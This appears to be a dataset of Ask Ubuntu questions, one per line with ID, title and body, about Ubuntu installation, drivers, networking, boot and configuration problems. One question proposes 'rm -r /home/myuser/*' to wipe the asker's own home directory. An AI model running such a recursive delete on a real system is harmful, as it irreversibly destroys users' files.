379066	terminal does not recogninze an installed program	i am new to linux and am using xubuntu . i have successfully installed maple 13 on my machine and its working fine . the problem is when ever i need to start maple , i have to do it through double click -- since typing maple or xmaple in terminal does not work the same as opening firefox by just typing firefox in terminal . why ? i want my terminal to open maple 13 when some command like maple or xmaple is typed .
379067	no sound in mac os x guest in virtual machine	i recently move to ubuntu 12.04 from windows . i run mac os x in vmware workstation . in windows it runs properly but in ubuntu no sound at all . i googled the issue but can not find an answer . if anyone helps i will be appreciate . thanks in advance .
379069	installed 13.10 over 12.04 . asus q200 laptop . wifi and ethernet do not work now	so i installed ubuntu a few weeks ago replacing windows 8 . got it working through all the uefs drive system stuff and had it working great . i decided to upgrade to 13.10 thought i would have better touchscreen support . so after install wifi and ethernet do not work anymore . i spent some time looking though other questions but i do n't see any answers that apply well . on install wifi works great . on reboot it wont connect . can you reinstall drivers from install usb drive ? thanks
379071	systemd-udev errors on startup	ubuntu 13.10 , hp-compaq 8510w laptop . i keep seeing the following message on startup and in dmesg : systemd-udevd [ 304 ] : error opening attr { /sys/devices/pci0000:00/0000:00:1f.2/ata5/host4 /target4:0:0/4:0:0:0/block/sda/sda6/size } for writing : permission denied i used to have both gnome-disks and gparted installed , until i noticed that gparted was not reporting the correct partitions or receiving updated partition information . i then removed gparted . i think gparted placed instructions for the systemd-udevd service , in a startup file , somewhere . as my partitions are fine as they are , and i want to remove those instructions . which file is it ? i 've tried ls and grep on the whole file system but have no better ideas .
379072	permissions wo n't change	i opened nautilus as super user to try and edit permissions . i can open the drop menu and change , but they instantly revert back to their original state before i can even click `` apply changes . '' what gives ? i 'm using ubuntu 12.04 on a virtualbox machine with a windows 8.1 host . the folder and it 's contents i 'm trying to gain access to is a shared folder between the host computer and the virtual machine .
379073	is there a screensaver settings gui for openbox/lxde ?	i am using lubuntu and i ca n't find any gui for screensaver settings . i am missing something ? lubuntu 13.10 .
379075	music cd-r holds a total of 260 mb of `` lossless '' audio ?	i just ripped a full ( all 74 minutes used ) music cd-r to six .flac files , one for each track . in total , the files add up to 262.1 mb . i thought a cd was supposed to hold 700 mb . where did the other 440 mb go ?
379076	ubuntu server install via usb . no install option , only test memory and rescue	i have created a usb install drive based on ubuntu-13.10-server-amd64.iso using universal usb installer v1.9.4.8 . when i boot from the usb drive after selecting my language , i do not get the option to install ubuntu server . i only get the following options : test memory boot from first hard disk rescue a broken system if i burn the iso to a cd and boot via an external usb cd drive the following menu options are available : install ubuntu server multiple server install with maaas check disk for defects test memory boot from first hard disk rescue a broken system is this a problem with the ubuntu server .iso file or with universal usb installer ? my motherboard is an asrock z87 extreme6 in case it 's an issue with my chipset .
379081	kubuntu kickstarter transparency	i have a problem on kubuntu , the kickstarter ( start menu thing ) was transparent till today , now its not transparent anymore , and i did n't changeany settings or so , all my theme things are like before ( transparent windows and so on ) just the kickstarter is not transparent anymore ... how can i get the transparency back ? i am on an acer c7 notebook ... i have another pc running ubuntu and there the kickstarter is transparent ( with the same theme ) oxygen black i think it 's called .
379089	server 12.04 install via dvd does nothing , reboots	i am building a new server on which i intend to install ubuntu server 12.04 lts . i have verified the install media ( burned dvd disc ) works on a separate system . when i choose `` install ubuntu server '' from the boot menu on the newly assembled computer , the machine reboots . i have tried selecting `` minimal install '' with the same results . some details about the hardware setup : asus kgpe-d16 with latest bios 2 x opeteron 6376 ( abu dhabi ) 256 gb ram ( successfully passed thru memtest ) asus dvd-rw drive 2 x 4tb hdd ( blank ) no network connection many , many cooling fans . bios appears to recognize all cpu , ram . is this a problem anyone has encountered with this or any other hardware ? much thanks .
379090	how to disable screen lock timeout from a script ?	i 'm looking for a way to disable screen dimming and desktop locking timeout from a bash script on ubuntu 13.10 . the script should be run when user logs in ( configured in startup applications window ) or as a service before lightdm ( from init.d ) . i have found this answer and tried the command : gconftool-2 -s /apps/gnome-screensaver/idle_activation_enabled -- type bool false it has actually changed that setting ( i 've checked with gconftool-2 -g and gconf-editor ) , but it does n't seem to work like expected . settings window still states that screen will turn off , and in fact , after 5 minutes screen turns off and i 'm prompted to enter my password when i wake it up . i 've also tried looking around in gconf-editor , but i have n't found any settings that looked relevant . so , how can i disable desktop locking and screen off timeout from a script ?
379091	i want to install a new ubuntu over my old 32 bit : but does n't proceed	i want to install is ubuntu 13.10 64 bit over my old 32 bit . but when i install it , after after entered password , it asks if i want to manual reboot later or reboot now . what ever the option i select it does n't proceed . i have tried it with turning computer off and on again and again , but nothing seems to work . so how do i install the new one ?
379092	frequently spinning up empty cd drive	ive just installed ubuntu 13.10 and have noticed the cd drive is spinning up frequently ( every 30 seconds or so ) any ideas what could be causing this ? im not opening nautilus , or anything else that might try and check the contents of the drive , and the drive is empty . ive checked the drive drawer and its securely closed , so i dont think its related to that either . any ideas ? hardware wise , its a lenovo z500t .
379097	how do i apply my mouse settings globally ?	i have tweaked my mouse sensitivity to be just right , and swapped the mouse buttons since i use it left-handed . this was done using the user `` mouse & touchpad '' settings in gnome . i 'd like this to apply to the login screen and all other user sessions ( since they 're all mine as well anyway ) . i 'm using gnome 3.8 under 13.10 , but other sessions might use unity or xfce . how do i apply my session mouse settings globally ?
379098	unable to get my surround sound to work	hi i id like to start by saying i am a complete newbie to linux and ubuntu i am on the latest release and i cant sort out the surround sound . its a 4.1 setup i am using the built in audio green and blue on my motherboard i have gone into the sound settings and cant see anything that i can really change as it only seems to see the green port . am i needing extra drivers/software or other setting . any help would be much appreciated .
379099	interactive script before login	i have an interactive script that i need to run before loggin in . what i have setup is a script that looks at a value i 've set on the kernel line from grub ie . backuptype=create_image what i 've got is a yesno dialog that says this will erase the old image are you sure ? or something of the sort . everything is fine - i see the prompt come up for about a second , and then it disappears and then linux logs in . if i manage to hit yes at the right time , the process ( image creation via partclone ) starts , but i ca n't see its progress . running this via the terminal after login works exactly as it should . i am executing this script from the rc.local file . is this the right place to put it ? how do i get the boot up sequence to pause until my process is done ?
379100	upgrade from an old version ( 12.04 ) to another old version ( 12.10 )	i have a laptop which needs proprietary drivers ( yes , i know ) . these are known to work on 12.04 but not other versions . i 've seen install guides and so on where people say that they could not get 13.10 to work via its installer ( and indeed neither could i ) but 12.04 did work . some people have successfully upgraded from 12.04 to 13.10 via the intermediate versions , with a bit of effort . my problem is that every upgrade guide i have read says `` just run upgrade-manager -d '' . from 12.04 the upgrade-manager only gives me the option to upgrade to 14.04 directly . so , how do i get from where i am to 12.10 ?
379101	problem connecting to wired network	i just installed ubuntu desktop on a brand new dell computer that had windows installed on it . i have the ethernet plugged in , but it does not connect to the internet . i get an ip address . it has dhcp subnet mask and a default gateway . even though the gateway is pingable , i can not ping the gateway . can anyone explain why i can not get to the internet and provide a solution ?
379102	windows hangs at grub 's purple screen when dual booting in legacy boot mode	i just installed my new computer ( gainward z87x-ud4h , i7-4770 , no video card ) . due to some gaming , i installed windows 7 first . afterwards i installed ubuntu 12.04 lts . now , my ubuntu starts without any problems . choosing windows in grub , it hangs on grub 's purple screen . again , this is not about a purple screen for linux ( for example , my computer boots to a black screen , what options do i have to fix it ? ) , it 's more related to this , this or this . how i can debug/fix that ? for the protocol , i tried : boot repair and the log here is a small movie , to demonstate the issue
379103	using ubuntu to backup ntfs to smb ( zfs )	i 'm trying to rescue a friend 's borked vista machine . i 've created an ubuntu boot disk and mounted both her ntfs partitions , and i 'm trying to back everything up before attempting the rescue . i 've mounted a target partition for the backup over my lan using smb ( underlying filesystem is zfs ) . i 've backed it up using the standard gui copy - there were a host of failures - all shortcuts , i think . is there a way i can check that everything important has made it across short of a manual check ? is there a better way of performing the backup ? clearly , i 'm not going to want to backup and restore the entire partition ( it 's borked ! ) ... thanks for any hints - adam ...
379104	how to set libreoffice to record and show changes by default ?	i would like to modify the default behavior of libreoffice so that it records and shows changes that i make . can i do that ?
379106	libc6 : i386 : depends : libgcc1 : i386 but it is not going to be installed	after upgrading to the newest version i ca n't start up my pc . i receive the error : the system is running in low-graphics mode after looking into the forums , i go into the terminal ( ctrl + alt + f1 ) i assumed this could be related to graphic drivers . it seems i need to install libc6-i386 , but the dependencies are broken : $ sudo apt-get install libc6 : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libc6 : i386 : depends : libgcc1 : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . i 'm very noob . not sure what details you would need . output of apt-cache policy libgcc1 : i386 is libgcc1 : i386 : installed version : 1:4.7.3-1ubuntu1 candidate : 1:4.7.3-1ubuntu1 table of versions : *** 1:4.7.3-1ubuntu1 0 500 http : //sk.arcive.ubuntu.com/ubuntu/ raring/main i386 packages 100 /var/lib/dpkg/status
379107	failed to install phablet-tools on 12.04	i could n't install phablet-tools on my 12.04 machine , i had try $ sudo apt-get update [ ... ] ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en [ ... ] $ sudo apt-get upgrade $ sudo apt-get install phablet-tools reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : phablet-tools : depends : python : any ( > = 2.7.1-0ubuntu2 ) but it is not installable e : unable to correct problems , you have held broken packages . and my python version : $ dpkg -l python desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-==============-==============-============================================ ii python 2.7.3-0ubuntu2 interactive high-level object-oriented langu i do n't know what 's wrong , any suggestion ?
379108	just installed ubuntu 12.04 lts . not detecting any wireless networks.. ?	during the installation process and after installation , ubuntu could n't detect any wireless networks to connect to . however , the wired connection works fine . also , the wireless connection works while i 'm in the windows 8 partition . i 've already tried trouble shooting and typing in several commands from older threads in terminal , but nothing seems to fix the problem . i 'm not tech savvy which makes these things very frustrating .
379110	creating folders on an ext2 unjournaled drive	i 'm currently trying to create a writeable folder on a ext2 drive . i took a usb drive and formatted it to ext3 using gparted . then i went into terminal and wrote in sudo mkfs.ext2 -j -i 128 /dev/ ... to make it an ext2 unjournaled drive . now i would like to make a writeable folder on that drive . i know i should write in the command line sudo mkdir [ link to drive ] my question is , where is the drive link ? the code that directs terminal to the drive ? where can i find that ? i 'm working on delivering a film to a cinema in a special format . thank you all in advance !
379111	having trouble creating .desktop file in 13.04	i downloaded the android developer 's bundle from google so i could attempt to learn app programming . it downloaded and it runs fine , but i ca n't figure out how to create a desktop launcher for it ! i can run it by getting into the directory its in and then running ./eclipse but i ca n't seem to set up a desktop launcher . i always get this error when i click on it : the command i am using is : /home/nate/android\ dev/adt-bundle-linux-x86-20130917/eclipse/eclipse.sh and /home/nate/android\ dev/adt-bundle-linux-x86-20130917/eclipse/eclipse does n't work either . i tried to follow these questions , but they did n't help much : how can i edit/create new launcher items in unity by hand ? , how can i add a bash script to the unity launcher ? , and how to add a shell script to launcher as shortcut . it 's all very annoying . i created a terminal alias to run it via the command eclipse , but that does n't work with the desktop launcher command . could anyone figure out how to do this , or something to read that i could use to solve it ? thanks ! edit : 11/22/2012 added .desktop file contents . [ desktop entry ] type=application terminal=true name=android ide icon=/home/nate/android\ dev/adt-bundle-linux-x86-20130917/eclipse/eclipse.png exec=/home/nate/android\\ dev/adt-bundle-linux-x86-20130917/eclipse/eclipse
379112	what should be the proper dhcp configuration for creating a ntwork over eth0 ?	even not under a real server like scenario , i 'm testing with dhcpd for learning and practice purposes . i 'm using ubuntu 12.04 lts . i want to offer a network by my eth0 interface . i receive ip and so internet by wlan0 . these are the ip adresses : 192.168.0.1 is my home router . 192.168.19.9 is my wlan0 ip . ( assigned by mac adress ) 192.168.0.196 is my eth0 ip . ( assigned by mac adress case i plug in to the router ) so , as it might be assumed , my home router dhcp mask is 255.255.0.0 . i want to test it at first with my raspberry . so over my eth0 bears a new network , and it or they ( case i plug a switch ) get ip adresses from my dhcp server . this is what i 've set for /etc/network/interface file : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.0.196 netmask 255.255.255.0 gateway 192.168.0.196 this is what i 've set for /etc/dhcp/dhcpd.conf file : option domain-name-servers 8.8.8.8,8.8.4.4 ; subnet 192.168.0.0 netmask 255.255.255.0 { option routers 192.168.0.196 ; range 192.168.0.10 192.168.0.120 ; } and i looked for a way to make my clients get access to internet , found this : sudo iptables -a forward -o wlan0 -i eth0 -s 192.168.0.0/24 -m conntrack -- ctstate new -j accept sudo iptables -a forward -m conntrack -- ctstate established , related -j accept sudo iptables -t nat -f postrouting sudo iptables -t nat -a postrouting -o wlan0 -j masquerade however , i 'm losing my wlan0 connection and not even my clients get ip not even way out to internet . i simply want to receive and consume connection by wlan0 , generate a new network over eth0 and share my wlan0 internet through it . what 's wrong in my configuration ?
379116	how to unblock port 1521 for oracle on ubuntu 13.10	i installed ubuntu 13.10 and oracle 10xe . i logged in to the oracle and did startup . everything is connected , oracle has been started . then i saw the following error : telnet localhost 1521 trying 127.0.0.1 ... telnet : unable to connect to remote host : connection refused i would like to use oracle with default port and i need to unblock it to use my java application . could you give me a simple solution , how to fix it ?
379117	ubuntu 12.04 boots to terminal every time after update	ubuntu 12.04 boots to terminal every time . i can log into the terminal and get unity going via startx to blank wallpaper then ctrl+alt+t terminal and unity -- restart . this then gets everything working as i wish ... until the next reboot rinse and repeat . how do i repair this so that i start directly into gui/unity ? edit : changing the env runlevel = 2 did net help . see the original file below . my /etc/init/rc-sysinit.conf follows : # rc-sysinit - system v initialisation compatibility # # this task runs the old system v-style system initialisation scripts , # and enters the default runlevel when finished . description `` system v initialisation compatibility '' author `` scott james remnant < scott @ netsplit.com > '' start on ( filesystem and static-network-up ) or failsafe-boot stop on runlevel # default runlevel , this may be overriden on the kernel command-line # or by faking an old /etc/inittab entry env default_runlevel=5 < -- i did try changing this to 2 emits runlevel # there can be no previous runlevel here , but there might be old # information in /var/run/utmp that we pick up , and we do n't want # that . # # these override that env runlevel=5 < -- i did try changing this to 2 env prevlevel=5 < -- i did try changing this to 2 console output env init_verbose task script # check for default runlevel in /etc/inittab if [ -r /etc/inittab ] then eval `` $ ( sed -nre 's/^ [ ^ # ] [ ^ : ] * : ( [ 0-6ss ] ) : initdefault : . */default_runlevel= '' \1 '' ; /p ' /etc/inittab || true ) '' fi # check kernel command-line for typical arguments for arg in $ ( cat /proc/cmdline ) do case `` $ { arg } '' in -b|emergency ) # emergency shell [ -n `` $ { from_single_user_mode } '' ] || sulogin ; ; [ 0123456ss ] ) # override runlevel default_runlevel= '' $ { arg } '' ; ; -s|single ) # single user mode [ -n `` $ { from_single_user_mode } '' ] || default_runlevel=s ; ; esac done # run the system initialisation scripts [ -n `` $ { from_single_user_mode } '' ] || /etc/init.d/rcs # switch into the default runlevel telinit `` $ { default_runlevel } '' end script
379120	ubuntu one fails to install correctly in windows 8.1 64bit	i have tried to install ubuntu one as the title suggests , and get the following error : '' typeerror required argument 'type ' ( pos 2 ) not found '' i have tried installing both as an administrator and as a regular user . version i used was 4.2.0 the program fails to connect to anything
379121	how to upgrade jaunty 9.04 to ubuntu 12.04 ?	i 'm very new to linux and have jaunty 9.04 installed on my computer . what are the steps should i take to upgrade it to 12.04 ? when i use upgrade manager , it tells me `` upgrade from jaunty to lucid is not supported with this tool '' . thank you
379122	dvd drive functioning only with ubuntu os	recently , i cleaned and assembled an acer laptop and attempted to install windows 7 ultimate ( factory os ) . however , the dvd drive , an opticarc dvd rw ad-7585h sata , does n't boot the dvd . i took it to another level : ubuntu 12.04 . so far , the drive can read music cds , but still does n't detect a working dvd with a different os when i insert it . how can i fix this ?
379123	can i zoom out windows or scale the whole desktop ?	i have a 17 '' laptop with 1600x900 resolution , but it 's not enough to open windows side by side . i 'm wondering if i could zoom out ( or any other solution ) windows ( or the whole desktop ) . is there a solution on xserver or on the wm to make this happen ? by the way , compiz zoom out plugin do n't let you to zoom out more than 1:1 which is not enough , i want to zoom out more the same way as spreading all windows with unity-tweak-tool .
379124	cant start after nvidia driver manual update	i have just manually updated my nvidia driver which seemed a bad idea . now every time i boot i end up with a blinking cursor in top left corner no idea how to get to command line alt+ctrl+fx do not work . please help me reinstall old drivers im stuck .
379130	graphics libray dislin requires openmotif with no simple install procedure -- any ideas ?	graphics libray dislin , for use with many compilers ( gfortran , in my case ) , requires the openmotif package . it 's not in the uscenter but is available here . it 's build is dependent on 14 other packages -- i 've spent most of a day on the install with little light at the end of the tunnel -- some of the dependent packages have changed configurations rendering the make files for openmotif obsolete and a real mess to fix . any ideas/workarounds would be appreciated -- i 'm a scientific apps programmer , not a sys admin . -- sam
379131	laptop fan running often and loudly for no reason since installing ubuntu	since installing ubuntu 12.04 on my dell inspiron notebook that came pre-installed with windows 8 ( very unfortunately ) , i have been experiencing an increase in the fan 's loudness and frequency of running . i have the system load indicator installed , and any time there is a spike ( even small spikes ) in resource usage , my fan turns on very loudly and continues for about two to five minutes . this happens also sometimes without a spike in resource usage . it happens about every 10 to 20 minutes . as far as i can tell , the temperature of the computer never rises enough to warrant such activity . i have looked around online and found some advice , but i did n't want to go in and start messing with things right away without someone giving sage advice for my particular problem and laptop . i am a brand new ubuntu user , and immensely enjoy everything about it thus far , except for the dramatic change in my fan . how can i fix these issues ? details about laptop : inspiron 15 notebook ( inspiron 3521 ) [ 225-3851 ] memory : 4gb , ddr3l , 1 dimm , 1600mhz [ 370-aaei ] video card : intel® hd graphics [ 320-9614 ] hard drive : 500gb 5400 rpm hard drive [ 342-5185 ] primary battery : 4 cell 40 whr battery [ 312-1395 ] processor : 3rd generation intel® core™ i3-3227u processor ( 3m cache , 1.9 ghz ) [ 338-bbgf ]
379134	intel graphics utility tool in 13.10 ?	is there a way to modify the intel graphics driver settings in ubuntu 13.10 ? i need to adjust the 3d texture quality . in windows that can be done with the software that comes with the driver but is ther a similar tool for ubuntu 13.10 ?
379136	kubuntu returns to sleep after wake	i have a dell latitude e5420m running kubuntu 13.04 ( now 14.04 ) . i have it set to suspend to ram whenever it detects a lid close . quite often , whenever i wake it up ( lid open ) , the computer stays active for 5-10 seconds ( fully operational ) and then returns to sleep without me closing the lid . i can wake it up afterward , at which point it functions normally . i have turned the internet inside out trying to find a solution to this , but i have found absolutely nothing . i have noticed this behavior with kubuntu 12.04 lts as well ( before i got a new hard drive ) , although it did not happen as often . edit : i recently updated to 14.04 , but i still experience this behavior .
379139	ubuntu 13.10 upgrade	13.10 upgrade hung in middle of install phase . eventually turned off computer to see what reboot will do . now only reboots to terminal mode in root directory . what to do ? thanks .
379140	how to make unity independent of every workspace ?	i 've been trying to get used to working with the workspaces , but the fact that the programs i use in workspace1 is accessible from every other workspace using unity , annoys me . for example , when some folder is opened in workspace1 and i 'm trying to open the home folder in workspace2 by clicking `` home folder '' , it takes me to the opened folder in workspace1 . how can i make unity independent of every workspace ?
379141	installing intel ethernet drivers in pxe ubuntu 12.04 lts install	i have an asus qm87m-e motherboard , just like in this other question . the board has an ethernet interface based on the intel i217lm part . however , i need to install ubuntu 12.04lts from a corporate server after doing a pxe boot . the intel instructions the other question links to seem to assume a pretty complete desktop installation , if i must compile the drivers before loading them . i guess i can compile the drivers on another desktop , but what files would i need to copy over , and where do i place them ? how can i get the drivers loaded under the pxe environment so that i can proceed with my network installation ? edit : i tried building on an ubuntu desktop and copying the files over , but the target machine says the module is an `` invalid format '' when i try to load it with modprobe . is this because the build machine is kernel 3.2.0-51 and the pxe environment is using 3.2.0-26 ?
379143	uncrop ( whitespace fill ) a pdf	suppose i have a pdf that is not an 8.5 by 11 aspect ratio . i want to convert this to 8.5 by 11 by filling in whitespace whereever it is necessary . is there a tool that will do this ?
379146	./opt/lampp folder & file editing help	i installed xampp but i need to edit folders and files in there . i did the following groupadd lampp usermod -a -g lampp kyle chown -r root : www-pub /var/www chmod 2775 /opt/lampp find /var/www -type d -exec chmod 2775 { } + find /var/www -type f -exec chmod 0664 { } + ( above code from here ) so ya , i logged out then back in and nothing changed . so ya any help would be awesome thanks - fred
379147	libreoffice writer is very laggy in 13.10	i had to do a project in which involved using tables in writer . it became extremely laggy to the point where i could no longer use it i.e stop responding . i 'm running ubuntu 13.10 and would appreciate any help on fixing this issue .
379149	cant login , broken pipe ?	okay , so i 'm really stuck on this one . so yesterday wile i was playing kerbal space program , the game crashed , so i did a hard shutdown ( holding the power button ) . when i turned it on , it booted just fine to the login screen , but when i went to click login , it gives me an error message , saying that `` could not write bites : broken pipes '' and goes back to the login screen . so i tried going on to the guest account , and that did work , so its just my account ... i already looked around on the net for answers , and i tried one where it was because there were removed packages , but when i checked , nothing was removed , ever . so i 'm completely lost here . please help !
379154	attempting to read lvm disk in ubuntu	i pulled a disk formatted in lvm from a nas after the device failed , and need to recover the data , but i ca n't seem to get it to mount . this is the closest i got : root @ peter-desktop : /home/peter # pvscan pv /dev/sdd5 vg c lvm2 [ 1.82 tib / 0 free ] total : 1 [ 1.82 tib ] / in use : 1 [ 1.82 tib ] / in no vg : 0 [ 0 ] root @ peter-desktop : /home/peter # vgscan reading all physical volumes . this may take a while ... found volume group `` c '' using metadata type lvm2 root @ peter-desktop : /home/peter # lvscan active '/dev/c/c ' [ 1.82 tib ] inherit root @ peter-desktop : /home/peter # mount -t ext3 /dev/c/c /mnt/fcroot mount : wrong fs type , bad option , bad superblock on /dev/mapper/c-c , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so does anybody know what is going wrong here ? is the drive corrupt ? the filesystem type was confirmed to be ext3 using the file command root @ peter-desktop : /home/peter # file -sl /dev/c/c /dev/c/c : linux rev 1.0 ext3 filesystem data , uuid=3ecd91ba-161a-4d7f-bac7-a3b1a7095be4 , volume name `` c '' ( large files ) and the last relevant errors in the dmesg log appear to be ext3-fs ( dm-3 ) : error : bad blocksize 16384 i do n't normally deal with command line mounting , but since the gui could n't mount the drive i did n't really have a choice , so please explain any code and i 'll do my best to understand it .
379156	the cd dvd boot option is n't showing up in bios	i am trying to dual boot ubuntu 13.10 but the option for it is n't in the bios . i did previously install ubuntu on my computer and tried to delete it but it didnt work . what do i do ?
379159	wireless connection keeps dropping on ubuntu 12.04 on a thinkpad t60	my thinkpad t60 running ubuntu 12.04 drops the wireless connection sporadically . it happens approximately once every five to ten minutes . the wireless connection does not have an issue with any other devices . i also dual boot windows xp on this machine and do not have issues with the connection while running xp . i attempted to set the ipv6 setting to ignore as suggested in other posts with similar issues . the power management for the wireless card is also turned off . if anyone could offer any diagnostic help , i 'd appreciate it . thanks .
379161	migrate from mysql 5.5.34 to mariadb 5.5.33 for ubuntu 12.04 lts	how to migrate mysql to mariadb since i 'm taking most of my time turning in circles . sorry if this question is to chicken for you guys . since i 'm new with ubuntu and in mariadb . yet most of the time i 've already familiarized with mysql . anything but using the terminal . thanks .
379162	ldap can not create new user group	i 'm following the below guide to setup a new server but have run into a problem that i have n't been able to fix . http : //www.danbishop.org/2012/06/02/ubuntu-12-04-ultimate-server-guide/ when using the command 'sudo ldapaddgroup domainadmins ' , i receive the error , `` error adding group domainadmins to ldap '' . when checking the log files it shows : nov 19 12:32:10 ubb01 ldapscripts : ldapaddgroup ( example ) : /usr/sbin/ldapaddgroup domainadmins ldap_bind : invalid credentials ( 49 ) ldap_bind : invalid credentials ( 49 ) ldap_bind : invalid credentials ( 49 ) - > error adding group domainadmins to ldap i 've seen other posts with the same error but they seem to popup in console , not in the log file . if anybody can assist it would be very appreciated . if the current configuration would help please let me know and i can update this question . update so i have tried reconfiguring ldap , recreating the database and adding in all changes again but i still receive the same message . i am really stumped as to what i should do from here . i ran through the guide ( in the above link ) again and have n't had any success . is anybody able to assist ? i have attached some files so you get a better idea of the current situation . /etc/krb5.conf https : //docs.zoho.com/file/gu1wa681708d4bef74e61a41c9da79ddebe82 /etc/ldap/ldap.conf # # ldap defaults # # see ldap.conf ( 5 ) for details # this file should be world readable but not world writable . # basedc=example , dc=com # urildap : //ldap.example.com ldap : //ldap-master.example.com:666 # sizelimit12 # timelimit15 # derefnever # tls certificates ( needed for gnutls ) tls_cacert/etc/ssl/certs/ca-certificates.crt
379164	how i can install gimp 2.8 and gimp 2.9 on the same computer ?	how i can install gimp 2.8 and gimp 2.9 on the same computer and work with both ?
379167	usb wifi card awus036nhr-rtl8192cu : card not blinks like normal	i am using ubuntu 13.10 . i have a awus036nhr-rtl8192cu usb wifi card . i have installed usb wifi card driver by following all the instructions available in web . but still getting error . it detect the networks but can not connect . the light on the wifi card adaptor is continuously blinking . but this blinking is not like in other wifi usb adaptors .
379168	gnuradio : libfftw3f.so.3 : can not open shared object file : no such file or directory	i just installed gnuradio on my ubuntu 12.04 . i tried running a simple wbfm receiver program that i got from online . when trying to execute the program , i get the following error : traceback ( most recent call last ) : file `` /home/me/downloads/uhd_wbfm_receive.py '' , line 10 , in < module > from gnuradio import analog file `` /usr/lib/python2.7/dist-packages/gnuradio/analog/__init__.py '' , line 33 , in < module > from analog_swig import * file `` /usr/lib/python2.7/dist-packages/gnuradio/analog/analog_swig.py '' , line 26 , in < module > _analog_swig = swig_import_helper ( ) file `` /usr/lib/python2.7/dist-packages/gnuradio/analog/analog_swig.py '' , line 22 , in swig_import_helper _mod = imp.load_module ( '_analog_swig ' , fp , pathname , description ) importerror : libfftw3f.so.3 : can not open shared object file : no such file or directory i 'm quite new to linux .
379169	how to wipe all contents from my user account ?	i 'm on 12.04 desktop and was wondering if the following command would remove all the data from my user home directory as well as my trash can : rm -r /home/myuser/* if so , can someone confirm that the -r flag will prevent ubuntu from asking me about each and every file ? and if not , what are the correct command ( s ) for doing so ? i understand that this wo n't clear out certain parts of my hard drive - i 'm not looking for that . just looking to make sure no more files exist on the file system under that directory and its respective trash can . thanks in advance !
379183	bad return status for module build on kernel : 3.2.0-56-generic-pae	description : ubuntu 12.04.3 lts release : 12.04 codename : precise error ! bad return status for module build on kernel : 3.2.0-56-generic-pae ( i686 ) consult /var/lib/dkms/alsa-hda/0.201204101019~maverick1/build/make.log for more information . dpkg : error processing alsa-hda-dkms ( -- configure ) : subprocess installed post-installation script returned error exit status 10 how can i fix this ? this worked ( sudo apt-get purge alsa-hda-dkms ) , thanks , new to this but not afraid to try .
379186	change search key to caps lock ( pixel )	i seem to be the only one who actually uses caps lock on a regular basis . i 've found plenty of details on mapping caps lock to something else , but nothing on how to map a key to caps lock . on the chromebook pixel , the search key opens up ubuntu home . how can i map that to caps lock ? the search key seems to be mapped to super . i 've tried /usr/bin/setxkbmap -option `` super : caps '' according to a modified version of this answer but no results .
379188	cant watch videos on browser : flash player not installed	i have a toshiba satellite c655 and have ubuntu 12.04 lts installed on it . i cant watch videos or basically do anything that requires flash player . i was able to on the previous version i had of ubuntu but since i upgraded i have n't been able to . i 've tried uninstalling and installing again using sudo apt-get install flashplugin-installer but has n't fixed the issue . i 'm kind of new to ubuntu and i think maybe i 'm missing something in the process how can i fix this issue ?
379189	how to change the theme of ubuntu 13.10 in ubuntu builder to mac osx lion	i am making an iso of ubuntu 13.10 32-bit with the mac osx theme . i screwed up and had to start all over , but before i screwed up i could n't open ubuntu tweak , unity tweak , or gnome tweak . i have everything set except the actual theme , can anyone help me with this ? i booted up to ubuntu 12.04 to make saucy with mac theme in ubuntu builder.thanks .
379192	virtualization with only ubuntu 12.04 lts os ?	i have ubuntu 12.04 lts os and overwrote my windows 8 partition . yes , stupid , but did n't think i would need it in the future . ended up getting another windows 8 and am attempting to create a windows 8 virtualbox . the problem : i need virtualization enabled in my bios in order to solve this problem . but , virtualization options do n't exist in my bios , with acer v3.. intel . i have been trying to use freedos , along with the bios update , but when adding them both to the same iso , they do n't boot up together . if i boot just the freedos , it works , but pointless if i ca n't include the bios update to enable virtualization options . kind of at a standstill , so if anyone has any questions or hints , it would be greatly appreciated . i 've gone through so many forums etc.. to try to figure this out . wine is not an option because it does n't work great with photoshop at all and is n't completely compatible . hope to get some good advice on possibly a step by step virtualization fix on ubuntu 12.04 lts without having windows on any other partition . maybe partition some for windows 8 , mount , then do the bios update ?
379195	missing librarries and unsure as to which ones ?	i have a very small and simple program # include < iostream > # include < fstream > # include < cstring > # include < cstdlib > using namespace std ; int main ( ) { ifstream inf ( `` artists.txt '' ) ; char* moneyshot ; inf > > moneyshot ; cout < < moneyshot ; return 0 ; } and i have it working on the labs at school . but on my machine it seg faults . program received signal sigsegv , segmentation fault . 0x00007ffff7de87ca in ? ? ( ) from /lib64/ld-linux-x86-64.so.2 i used gdb and realized it was doing this at the cout line , and i can ony conclude that i 'm missing libraries , i 'm unsure as to which ones and i was wondering how to find the missing ones and how to get them ?
379196	incorrect bandwidth reported by gnome system monitor , ksysguard and bmon - ubuntu 13.10	ever since i updated to ubuntu 13.10 , the network bandwidth is reported incorrectly ; the result is always 0 kb/s . this is the same result produced y bmon , gnome system monitor and ksysguard . how do i fix this ? additional information : the ethernet card of my machine is ar 8161 .
379197	upgrade problem . can i switch to a window from command line ?	here is what 's happening . i started updating my laptop from 12.04 to the next one ( command line ) and was surfing the web . at some point everything vanished from the screen except the firefox window content . in addition , the keyboard shorcuts stopped working ( alt+tab , alt+esc , alt+f2 etc . ) this means that i ca n't switch to the update terminal , where i think the update is stalled asking for a y/n . i managed to run a new terminal by opening nautilus from the desktop and browsing to gnome-terminal . q1 : is there a way to switch a window from the terminal so that i can continue the upgrade ? q2 : what would happen if i just reboot in the middle of the upgrade process . note : i ca n't install any new software ( such as wmctrl ) since the upgrade has a lock on the packages . edit 1 : i built wmctrl from source , but wmctrl -l does n't list the gnome-terminal windows for some reason . edfi 2 : i managed to get the upgrade terminal window back by just starting unity from the other terminal . shortcuts still do n't work , so now i have part screen firefox par screen terminal but ca n't do anything else until the upgrade is done .
